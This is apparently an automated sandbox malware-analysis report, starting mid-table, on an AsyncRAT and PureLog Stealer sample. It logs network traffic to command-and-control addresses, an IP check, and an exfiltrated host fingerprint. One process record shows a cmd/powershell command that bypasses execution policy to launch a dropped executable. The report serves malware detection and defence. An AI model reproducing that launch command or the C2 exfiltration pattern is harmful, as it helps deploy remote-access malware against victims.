                                                          Dec 13, 2024 12:00:17.228337049 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:18.188333988 CET8049716193.122.130.0192.168.2.8
                                                          Dec 13, 2024 12:00:18.188560009 CET4971680192.168.2.8193.122.130.0
                                                          Dec 13, 2024 12:00:29.839798927 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:00:29.959462881 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:29.959599018 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:00:30.079365969 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:30.380366087 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:30.480561018 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:00:30.588181019 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:30.590488911 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:00:30.710861921 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:30.711044073 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:00:30.830962896 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:37.934541941 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:37.979754925 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:00:38.125897884 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:38.182884932 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:00:43.169943094 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:00:43.289709091 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:43.289797068 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:00:43.409701109 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:43.698153973 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:43.824115038 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:00:43.889837980 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:43.894074917 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:00:44.014024019 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:44.014122009 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:00:44.134083033 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:53.199042082 CET4971680192.168.2.8193.122.130.0
                                                          Dec 13, 2024 12:00:53.318775892 CET8049716193.122.130.0192.168.2.8
                                                          Dec 13, 2024 12:00:56.511629105 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:00:56.631295919 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:56.631364107 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:00:56.751390934 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:57.049201012 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:57.125740051 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:00:57.240748882 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:57.298649073 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:00:57.419441938 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:57.419502020 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:00:57.539418936 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:01:07.934812069 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:01:07.979810953 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:01:08.126610041 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:01:08.182949066 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:01:09.923353910 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:01:10.043661118 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:01:10.048506975 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:01:10.168292999 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:01:10.454108000 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:01:10.645694971 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:01:10.645771027 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:01:10.648586035 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:01:10.768404961 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:01:10.768510103 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:01:10.888462067 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:01:23.246439934 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:01:23.366597891 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:01:23.367177010 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:01:23.487457037 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:01:23.781497002 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:01:23.783910036 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:01:23.903826952 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:01:23.903883934 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:01:24.024545908 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:01:36.590034962 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:01:36.709758997 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:01:36.710639954 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:01:36.830405951 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:01:37.131208897 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:01:37.276719093 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:01:37.323096991 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:01:37.324954987 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:01:37.444638968 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:01:37.444701910 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:01:37.564467907 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:01:37.934060097 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:01:37.982675076 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:01:38.125705004 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:01:38.169699907 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:01:49.949368000 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:01:50.069112062 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:01:50.072765112 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:01:50.192579985 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:01:50.560144901 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:01:50.683115959 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:01:50.761423111 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:01:50.763362885 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:01:50.883328915 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:01:50.886795998 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:01:51.006724119 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:03.293036938 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:03.413016081 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:03.413122892 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:03.532973051 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:03.824944973 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:03.870557070 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:04.015943050 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:04.020127058 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:04.140474081 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:04.140710115 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:04.260622025 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:07.935862064 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:08.075253010 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:08.126363993 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:08.183120966 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:16.639523983 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:16.759408951 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:16.759793043 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:16.879740000 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:17.324877977 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:17.370543957 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:17.541867971 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:17.544069052 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:17.664515018 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:17.664561033 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:17.784802914 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:29.996289968 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:30.117237091 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:30.117384911 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:30.237874985 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:30.538417101 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:30.683159113 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:30.729881048 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:30.731810093 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:30.851715088 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:30.851785898 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:30.971868992 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:37.935511112 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:37.980032921 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:43.341561079 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:43.461762905 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:43.462224007 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:43.582102060 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:43.881280899 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:43.980021954 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:44.073004007 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:44.077080011 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:44.196899891 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:44.196975946 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:44.316916943 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:53.855355024 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:53.975369930 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:53.976721048 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:54.096627951 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:54.393536091 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:54.448940039 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:54.585124969 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:54.586143970 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:54.706068993 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:02:54.706172943 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:02:54.825998068 CET804970482.64.156.123192.168.2.8

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 13, 2024 11:59:11.488354921 CET5925753192.168.2.81.1.1.1
                                                          Dec 13, 2024 11:59:11.629452944 CET53592571.1.1.1192.168.2.8
                                                          Dec 13, 2024 11:59:11.830190897 CET6212553192.168.2.81.1.1.1
                                                          Dec 13, 2024 11:59:11.967324972 CET53621251.1.1.1192.168.2.8

                                                          ICMP Packets

                                                          TimestampSource IPDest IPChecksumCodeType
                                                          Dec 13, 2024 11:59:11.634984970 CET192.168.2.8172.217.17.784d5aEcho
                                                          Dec 13, 2024 11:59:11.757571936 CET172.217.17.78192.168.2.8555aEcho Reply

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Dec 13, 2024 11:59:11.488354921 CET192.168.2.81.1.1.10x829Standard query (0)google.comA (IP address)IN (0x0001)false
                                                          Dec 13, 2024 11:59:11.830190897 CET192.168.2.81.1.1.10x1f4cStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Dec 13, 2024 11:59:11.629452944 CET1.1.1.1192.168.2.80x829No error (0)google.com172.217.17.78A (IP address)IN (0x0001)false
                                                          Dec 13, 2024 11:59:11.967324972 CET1.1.1.1192.168.2.80x1f4cNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                          Dec 13, 2024 11:59:11.967324972 CET1.1.1.1192.168.2.80x1f4cNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                          Dec 13, 2024 11:59:11.967324972 CET1.1.1.1192.168.2.80x1f4cNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                          Dec 13, 2024 11:59:11.967324972 CET1.1.1.1192.168.2.80x1f4cNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                          Dec 13, 2024 11:59:11.967324972 CET1.1.1.1192.168.2.80x1f4cNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                          Dec 13, 2024 11:59:11.967324972 CET1.1.1.1192.168.2.80x1f4cNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                          Dec 13, 2024 12:00:12.893142939 CET1.1.1.1192.168.2.80x9a3cNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                          Dec 13, 2024 12:00:12.893142939 CET1.1.1.1192.168.2.80x9a3cNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • checkip.dyndns.org

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.84970482.64.156.123804300C:\Users\user\Desktop\AsyncClient.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 13, 2024 11:58:52.038139105 CET95OUTData Raw: 16 03 01 00 5a 01 00 00 56 03 01 67 5c 13 6b c3 51 d0 48 c4 d3 d8 05 5f a9 10 d4 92 e6 97 b7 cc a5 7c 37 bc 3b 2d 2f e1 32 b5 a1 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 1f 00 0a 00 08 00 06 00 1d 00 17 00 18 00 0b 00 02 01 00
                                                          Data Ascii: ZVg\kQH_|7;-/25/#
                                                          Dec 13, 2024 11:58:53.284528017 CET1236INData Raw: 16 03 01 07 c4 02 00 00 51 03 01 67 5c 13 6d a7 45 03 53 4d 2c b8 ff 47 76 70 59 82 da a1 48 54 ed 46 87 63 3c 72 a1 cd 34 40 14 20 b9 09 00 00 7a cf 53 0a c6 65 72 8e e7 6e 7f c3 64 5a 34 00 05 6d 26 08 c8 de d9 60 54 df ea a6 c0 14 00 00 09 00
                                                          Data Ascii: Qg\mESM,GvpYHTFc<r4@ zSerndZ4m&`T00e$D~zz0*H010UAsyncRAT Server0 241210062656Z99991231235959Z010UAsyncRAT Server0"0
                                                          Dec 13, 2024 11:58:53.284557104 CET757INData Raw: fe 09 d8 99 5c 4b a6 f2 bf 1e 8f 2e 0c 00 88 4f 67 cc d7 33 e6 dc 42 53 c0 39 8b 05 75 fc 09 a7 76 81 4f 93 de 64 5a f7 6c 68 20 a5 ff d3 dc ac 24 4d 67 6b a3 48 e9 a4 20 90 39 26 2a 4a f2 43 0a c7 10 30 2c f7 2e 9e 90 70 11 5d 42 0e fd 9f 1f dd
                                                          Data Ascii: \K.Og3BS9uvOdZlh $MgkH 9&*JC0,.p]B;-'B&G)6rC^CE2#,UbcM2]gaxSi'x|i3M]M1c?eZL*x.&pqY 7Avv&T
                                                          Dec 13, 2024 11:58:53.291718960 CET166OUTData Raw: 16 03 01 00 66 10 00 00 62 61 04 f8 46 40 8b 17 89 a2 bf 5a 16 88 7c 65 08 41 15 0b 75 5b 28 dc 92 19 74 6e 93 92 25 aa a5 a1 98 1e ca 06 2a de f4 c2 b5 92 15 4a 29 b2 23 54 59 dd a7 fd 02 d1 ba 9c d4 03 e7 e4 fd b2 b3 dd c9 8a ac ae 72 be 1a 21
                                                          Data Ascii: fbaF@Z|eAu[(tn%*J)#TYr!~xY&/yb00oI{d}[Jz<{PW*6jik{
                                                          Dec 13, 2024 11:58:53.692540884 CET59INData Raw: 14 03 01 00 01 01 16 03 01 00 30 65 bd 8d 76 7d b6 24 f0 6d 55 4e 2b 93 69 5f 5e 99 c3 97 28 b7 74 f6 a3 13 80 b5 a5 7c 96 87 0d c1 88 d0 c4 4e 27 be f9 f1 e0 b1 55 7f 77 e3 95
                                                          Data Ascii: 0ev}$mUN+i_^(t|N'Uw
                                                          Dec 13, 2024 11:58:56.349673986 CET74OUTData Raw: 17 03 01 00 20 5d 9a 8e 35 ed 9c 0f cb 92 1b d9 0e d1 b0 8c c3 83 7b cf 46 2a fd 07 25 7d 40 23 2d 6d 69 07 5c 17 03 01 00 20 2c 5b f0 8b 7c 40 6c 11 c0 6c 76 45 37 59 12 6b 37 a7 f5 a9 b9 3f 0a af a8 0c 27 87 42 73 fe 02
                                                          Data Ascii: ]5{F*%}@#-mi\ ,[|@llvE7Yk7?'Bs
                                                          Dec 13, 2024 11:58:56.471287966 CET330OUTData Raw: 17 03 01 00 20 80 58 59 72 0d c0 57 12 98 4c 02 30 04 78 79 ee 2d 1e 98 a4 bf 99 3e c1 75 c5 a5 69 c3 74 6f dc 17 03 01 01 20 a6 25 c5 fd 3f 08 c2 d4 c7 b7 ff cc fd f9 9b fc 5c 50 dd cc 96 95 fe 3d b4 87 79 0c af fb f4 ed 61 f4 3e 52 17 b5 12 d4
                                                          Data Ascii: XYrWL0xy->uito %?\P=ya>RMT,6iLG{}6tYequmpRz3A`ko-G4$)uKGFH MlV1ZVkt&o6[>otKuM)2z
                                                          Dec 13, 2024 11:58:58.513736963 CET74INData Raw: 17 03 01 00 20 34 1a bd fc 6f 1f 99 07 2c 29 3f b6 8f 86 58 a8 46 34 b6 4b 0d 4c 67 69 11 55 b5 34 88 84 34 cb 17 03 01 00 20 56 6f d6 c3 b7 d6 c7 3c b6 26 18 01 78 49 2f f4 9b 2f 6e 41 b5 c3 34 dd e2 54 31 49 52 af a9 f3
                                                          Data Ascii: 4o,)?XF4KLgiU44 Vo<&xI//nA4T1IR
                                                          Dec 13, 2024 11:58:58.513781071 CET1236INData Raw: 17 03 01 00 20 be bb 79 36 51 8c ff 35 55 a3 d5 d9 f0 ad 17 fe 6a 14 e2 5a f6 4d fd 25 73 d8 2a 5e a1 ff 50 0a 17 03 01 3f d0 92 90 58 2c c3 a1 66 aa 6b f9 68 4c 9a 51 ce 5a 8e 33 0c 41 48 6e 45 6d b1 b6 98 2b 14 c5 3a c2 8a fc 89 90 1d ff ce c2
                                                          Data Ascii: y6Q5UjZM%s*^P?X,fkhLQZ3AHnEm+:7Vj!\u&<P&mjVwn5w3JleB-gym'v8-Jag]^MJJ+1$Z3R!SW*WfO|xHEJEz
                                                          Dec 13, 2024 11:58:58.513925076 CET1236INData Raw: 32 a8 72 e0 e1 cd ba 1e dc 82 ff 69 6a d7 76 e2 2a 61 34 a3 ef 62 23 18 e0 99 7c 91 f3 f0 dc f4 30 f5 d7 8a ba d1 d6 9f ef 91 10 db 0a 32 74 46 38 a7 a5 94 a5 e7 ec 8a 5d 1a 65 45 c9 dc ba b3 aa 3e a1 86 40 9c b9 d9 4a 12 32 5f f1 a5 e2 ee 47 19
                                                          Data Ascii: 2rijv*a4b#|02tF8]eE>@J2_Gb+4Y4"x:_dT3S{v~9zLb+4 TAc(eXqHEWl+pnbMqy0v9=9r`foEs]mL]WT{-A7Cp4w+7B=54


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.84970682.64.156.123804300C:\Users\user\Desktop\AsyncClient.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 13, 2024 11:59:00.772866964 CET127OUTData Raw: 16 03 01 00 7a 01 00 00 76 03 01 67 5c 13 74 06 dd 02 69 f2 74 96 46 a3 c4 e9 98 bb 50 93 9e 77 3c f4 ea 9c bf 9b 6d 46 2d af 7b 20 b9 09 00 00 7a cf 53 0a c6 65 72 8e e7 6e 7f c3 64 5a 34 00 05 6d 26 08 c8 de d9 60 54 df ea a6 00 0e c0 0a c0 09
                                                          Data Ascii: zvg\titFPw<mF-{ zSerndZ4m&`T5/#
                                                          Dec 13, 2024 11:59:02.030386925 CET149INData Raw: 16 03 01 00 55 02 00 00 51 03 01 67 5c 13 76 7b 33 aa 29 1d 73 d4 16 6b b7 b9 16 17 14 d2 8a d7 4e 9b ba 30 37 69 6f 6b 60 6b fd 20 b9 09 00 00 7a cf 53 0a c6 65 72 8e e7 6e 7f c3 64 5a 34 00 05 6d 26 08 c8 de d9 60 54 df ea a6 c0 14 00 00 09 00
                                                          Data Ascii: UQg\v{3)skN07iok`k zSerndZ4m&`T0&)F3;>f!Z2Qw8=;F*\U
                                                          Dec 13, 2024 11:59:02.075869083 CET59OUTData Raw: 14 03 01 00 01 01 16 03 01 00 30 c8 d1 5f 73 69 3b 4e fd da 7c df 5b 2f ec 83 1e 95 96 d6 75 13 14 66 07 66 b1 46 9c b9 88 8f 45 6c 11 80 cd 60 d8 ec 01 b3 0e d0 a7 93 d3 46 ef
                                                          Data Ascii: 0_si;N|[/uffFEl`F
                                                          Dec 13, 2024 11:59:03.454088926 CET74OUTData Raw: 17 03 01 00 20 5d d0 43 a5 a6 26 85 c6 b6 ba e6 b3 1d fb af 77 52 40 35 a2 6d aa 89 1f eb 7f 60 02 2f 7e 48 6a 17 03 01 00 20 1e 4d 69 53 51 33 12 4e 88 56 78 93 02 b7 3e 39 88 0a 8c 5b 91 d4 e1 e9 eb 3e 53 13 d4 ca b9 4b
                                                          Data Ascii: ]C&wR@5m`/~Hj MiSQ3NVx>9[>SK
                                                          Dec 13, 2024 11:59:03.463174105 CET154OUTData Raw: 17 03 01 00 20 68 81 f6 e4 3f 76 d7 04 34 1c d8 f9 6a f1 14 7c d8 25 2a 3d d0 39 34 47 2c 71 4b 6f ae bf 45 b1 17 03 01 00 70 87 18 d1 ee 1a 4d 40 ec 48 d6 78 6d 91 d2 51 33 7e 1a 3d 89 38 0d 0e 4d fc a4 87 79 af 49 38 91 b6 c2 08 c7 ad 2a 78 69
                                                          Data Ascii: h?v4j|%*=94G,qKoEpM@HxmQ3~=8MyI8*xiwHuE=ALR&Yw7/4v[6~bPCSkqe


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.849716193.122.130.0804268C:\Users\user\AppData\Local\Temp\hklugq.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 13, 2024 11:59:12.092665911 CET68OUTGET / HTTP/1.1
                                                          Host: checkip.dyndns.org
                                                          Connection: Keep-Alive
                                                          Dec 13, 2024 11:59:13.188985109 CET321INHTTP/1.1 200 OK
                                                          Date: Fri, 13 Dec 2024 10:59:13 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 104
                                                          Connection: keep-alive
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          X-Request-ID: bd66b86b61bb397f9eb0d39345322efa
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.84971583.147.52.247804268C:\Users\user\AppData\Local\Temp\hklugq.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 13, 2024 11:59:13.190536022 CET8OUTData Raw: 7a 00 00 00 00 00 00 00
                                                          Data Ascii: z
                                                          Dec 13, 2024 11:59:13.310813904 CET122OUTData Raw: 00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00 00 06 01 00 00 00 62 38 34 35 36 37 38 38 34 35 7c 44 65 66 61 75 6c 74 5f 20 7c 20 68 75 62 65 72 74 40 37 36 37 36 36 38 7c 43 48 7c 57 69 6e 64 6f 77 73 20 31 30 20 45 6e 74 65 72 70 72 69 73 65
                                                          Data Ascii: b845678845|Default_ | user@767668|CH|Windows 10 Enterprise|123 ms|12/13/2024|4.0.0.2|8.46.123.189


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:05:58:46
                                                          Start date:13/12/2024
                                                          Path:C:\Users\user\Desktop\AsyncClient.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\AsyncClient.exe"
                                                          Imagebase:0x630000
                                                          File size:48'640 bytes
                                                          MD5 hash:DA0C2AB9E92A4D36B177AE380E91FEDA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000000.1429164611.0000000000632000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000000.1429164611.0000000000632000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.3890281185.00000000069C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.3883921677.0000000002951000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.3887100642.0000000003957000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:false

                                                          General

                                                          Target ID:2
                                                          Start time:05:59:01
                                                          Start date:13/12/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\hklugq.exe"' & exit
                                                          Imagebase:0xa40000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:3
                                                          Start time:05:59:01
                                                          Start date:13/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
